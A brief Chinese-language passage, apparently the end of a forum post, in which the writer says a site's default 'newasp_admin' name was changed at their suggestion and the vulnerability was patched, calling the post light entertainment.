原来是newasp_admin 后来喊他改了 HOHO 漏洞也补了

没什么技术含量 纯属娱乐别见笑哈.